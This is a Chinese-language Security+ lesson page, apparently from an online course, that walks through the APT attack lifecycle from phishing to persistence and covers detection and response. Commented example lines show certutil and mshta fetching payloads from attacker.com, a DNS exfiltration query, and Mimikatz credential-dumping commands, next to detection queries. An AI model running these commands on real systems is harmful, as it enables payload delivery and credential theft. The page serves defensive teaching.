APT 生命周期:从初始访问到持久化
跟踪 APT 从鱼叉式网络钓鱼初始访问,到建立 C2、权限提升和能够在重启及重新部署后继续存在的持久化机制。
APT 生命周期:从初始访问到持久化 是 CoddyKit 上的免费 Cloud & IT Cert Prep 课时。 这是第 1 节课,共 4 节。 你可以在下方免费阅读本课时的完整内容 — 然后在浏览器中使用内置代码编辑器和全天候 AI 导师进行实践。 这是 Cloud & IT Cert Prep 学习路径的一部分,你的进度在网页和 CoddyKit 应用中同步。 Cloud & IT Cert Prep 课程共包含 4 节课。
什么是高级持续性威胁?
高级持续性威胁(APT)是一种复杂的长期网络攻击活动,通常由国家级行为者或资金充足的犯罪团伙实施,并具有明确的战略目标。其三个决定性特征是:高级——使用定制恶意软件、零日漏洞和新颖技术;持续性——秘密维持数月或数年的存在,而不是实施一次性的快速攻击;威胁——针对特定组织开展协调一致的定向攻击。知名的 APT 组织包括与俄罗斯 GRU 有关联的 APT28(Fancy Bear)、与中国有关联的 APT41,以及与朝鲜有关联的 Lazarus Group。
初始访问:APT 如何进入系统
APT 活动通常会从少数几种经过验证的初始访问技术之一开始。最常见的方法是利用带有武器化附件或窃取凭据链接的鱼叉式网络钓鱼——邮件看起来像是来自受信任的同事或合作伙伴。供应链入侵(如 SolarWinds/SUNBURST)会将恶意代码植入受信任的软件更新中。攻击者还会利用未修补的 CVE,攻击面向互联网的服务,例如 VPN 设备、Exchange 服务器和 Web 应用程序。水坑攻击则会入侵目标组织员工经常访问的网站,并向访问者投放路过式攻击。
执行:运行第一个载荷
获得初始访问权限后,攻击者必须在目标系统上执行第一个载荷。APT 偏好与正常系统活动混合的技术:在 Office 文档中嵌入恶意宏,当受害者启用内容时执行;使用HTML Application(HTA)文件,在文件打开时执行脚本;以及使用寄生式本地二进制文件(LOLBin)——利用 mshta.exe、certutil.exe、regsvr32.exe 或 wscript.exe 等合法 Windows 工具执行攻击者代码,从而绕过应用程序允许列表。这些技术使初始载荷很难与合法的系统活动区分开来。
# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta
# Detection: alert on certutil/mshta with network connectionsC2 建立:回连控制端
初始载荷运行后,会建立一条返回攻击者基础设施的命令与控制(C2)通道。现代 APT 的 C2 会使用旨在躲避检测的技术:通过HTTPS 访问仿冒域名,伪装成合法的云服务(Teams、OneDrive、GitHub);使用DNS 隧道,将命令编码到 DNS TXT 记录查询中,使其看起来像正常的 DNS 流量;使用域生成算法(DGA),根据种子每天生成新的 C2 域名,使域名阻断失效;以及利用合法云平台(Slack API、Google Sheets、Twitter)作为通信渠道,实施寄生式本地 C2。
# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)
# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)发现:绘制环境地图
建立 C2 后,APT 行为者会执行内部侦察,以便在继续行动前了解环境。这包括:使用 BloodHound 等工具进行Active Directory 枚举,绘制信任关系并识别高价值目标;执行网络扫描,识别活动主机、服务和开放端口;通过搜索文件系统中的配置文件、密码数据库或浏览器中存储的凭据来进行凭据发现;以及执行身份枚举,识别特权账户、服务账户和管理员工作站。大多数发现活动都使用原生 Windows 工具(net user /domain、ipconfig、nltest)来避免被检测。
# Native Windows commands used by APTs for discovery
# net user /domain # list domain users
# net group 'Domain Admins' /domain # list domain admins
# ipconfig /all # network configuration
# netstat -ano # active network connections
# tasklist /v # running processes权限提升:获取管理员权限
APT 通常使用权限有限的用户凭据取得初始访问权限,因此必须提升权限才能实现其目标。常见的提权路径包括:使用 Mimikatz 从内存中窃取凭据(从 LSASS 进程内存中提取 NTLM 哈希);执行Kerberoasting(请求服务账户的服务票据,并在离线状态下破解);利用权限薄弱的错误配置服务(不安全的服务二进制路径、DLL 劫持);以及执行令牌模拟,窃取特权进程的身份验证令牌。绕过 User Account Control(UAC)的技术可以在不触发 UAC 提示的情况下,从标准管理员权限提升到 SYSTEM。
# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords
# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS process持久化机制:在重启后继续存在
APT 会投入大量资源构建能够在重启和重新映像后继续存在的持久化机制,因为初始访问可能很难获得且代价高昂。常见的 Windows 持久化技术包括:Registry Run Keys(HKLM\Software\Microsoft\Windows\CurrentVersion\Run);按固定计划执行恶意软件的Scheduled Tasks;自动启动的Windows Services;WMI Event Subscriptions(难以检测,并且能在大多数清理操作后继续存在);DLL Search Order Hijacking;以及Boot/Pre-OS implants(能够在重新安装 OS 后继续存在的 UEFI 固件植入物,由 Equation Group/与 NSA 有关联的行为者使用)。
# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services
# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'防御规避:隐藏于众目睽睽之下
APT 会广泛采用防御规避手段,以避免被端点安全工具和分析人员发现。相关技术包括:进程注入——将恶意代码注入 explorer.exe 或 svchost.exe 等合法进程,使恶意软件在受信任的进程名称下运行;时间戳篡改——修改文件时间戳,使恶意文件看起来已经存在多年;日志删除与篡改——清除 Windows Event Logs 以移除证据;滥用代码签名证书——使用窃取的合法证书为恶意软件签名;以及内存中执行(无文件恶意软件),整个过程从不接触磁盘,因此基于文件的 AV 无法发现它。
数据外泄:秘密窃取数据
APT 会仔细管理数据外泄,以避免触发 DLP 控制和带宽异常检测。相关技术包括:数据暂存——先将目标数据收集到加密压缩包中,再在数天内通过网络分成小块外泄;通过HTTPS 外泄到云存储服务(OneDrive、Dropbox),这些服务通常被企业防火墙规则允许;隐写术——将数据隐藏在图像文件中;以及在基于时间的外泄中选择工作时间进行传输,以混入合法流量。APT 只会外泄所需的数据(高价值知识产权、凭据、战略计划),而不是将所有内容批量复制,从而尽量减少活动痕迹并降低被发现的概率。
检测 APT 活动:关键指标
APT 检测要求超越单个警报,在整个攻击链中识别相互关联的活动模式。关键指标包括:异常的父子进程关系(例如 Word 启动 PowerShell);PowerShell 编码命令或从互联网下载内容;在异常时间创建的计划任务或服务;非系统进程对 LSASS 内存的访问;通过 SMB 或 WMI 从工作站进行的横向移动;以及异常的出站 DNS 查询,其子域名长度过长。MITRE ATT&CK Navigator允许防御人员将检测到的技术映射到 ATT&CK 矩阵,并找出检测覆盖范围中的空缺。
# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLineAPT 响应:在不惊动攻击者的情况下遏制威胁
响应正在进行的 APT 需要谨慎权衡:在不惊动攻击者的情况下遏制威胁。过早遏制(阻断 C2 流量、禁用帐户)可能导致 APT 激活破坏性载荷,或加快数据外泄。最佳实践包括:收集情报期间进行隐蔽监控;逐步使用防火墙规则隔离受感染主机,但不阻断 C2;部署欺骗技术(蜜标记、金丝雀帐户)以监控攻击者活动;以及在采取重大遏制措施前与执法部门协调。完整的修复需要识别所有持久化机制和已遭入侵的帐户——只要漏掉一个植入程序,攻击者就可能卷土重来。
快速检查
请测试您对本课 CompTIA Security+ (SY0-701) 概念的理解。
课程回顾
在本课中,您学习了:APT 是通常持续数月的高级、持久且有针对性的攻击活动,其初始访问通常通过鱼叉式网络钓鱼、供应链攻击或利用漏洞实现;APT 使用 LOLBins 和合法云服务进行 C2,以混入正常流量并规避检测;此外,持久化机制的范围从 Registry Run Keys 到 UEFI 固件植入,其中 WMI 订阅尤其难以检测和修复。接下来,我们将学习包括 Pass-the-Hash 和 Pass-the-Ticket 在内的横向移动技术。
常见问题解答
「APT 生命周期:从初始访问到持久化」课时是免费的吗?
是的 — 「APT 生命周期:从初始访问到持久化」的完整文本可在网页上免费阅读。要进行交互式练习(内置代码编辑器和全天候 AI 导师)并解锁 Cloud & IT Cert Prep 课程的其余内容,请升级到 CoddyKit PRO。 Cloud & IT Cert Prep 课程共包含 4 节课。
「APT 生命周期:从初始访问到持久化」这节课中我会学到什么?
跟踪 APT 从鱼叉式网络钓鱼初始访问,到建立 C2、权限提升和能够在重启及重新部署后继续存在的持久化机制。 你通过在浏览器中直接运行的动手代码来练习 Cloud & IT Cert Prep,全天候 AI 导师会在你学习这节课的过程中回答你的问题。
学习 Cloud & IT Cert Prep 需要有经验吗?
无需任何先前经验。CoddyKit 上的 Cloud & IT Cert Prep 课程适合初学者到高级学习者,你可以从这里开始或从头开始,按照自己的节奏学习。 这是第 1 节课,共 4 节。
「APT 生命周期:从初始访问到持久化」课时需要多长时间?
大多数 CoddyKit 课程大约需要 5–10 分钟。每节课都很精短且互动,所以你能稳步进步,并在网页和应用中从离开的地方继续。
我能在这节 Cloud & IT Cert Prep 课中编写并运行代码吗?
能。每节 Cloud & IT Cert Prep 课都包含内置代码编辑器,你可以在浏览器中直接编写并运行真实代码,并获得即时 AI 反馈 — 无需本地设置。
此课程中的所有课时
- APT 生命周期:从初始访问到持久化
- 横向移动:传递哈希与传递票据
- Kerberoasting 与黄金票据攻击
- 用于检测与响应的 MITRE ATT&CK 框架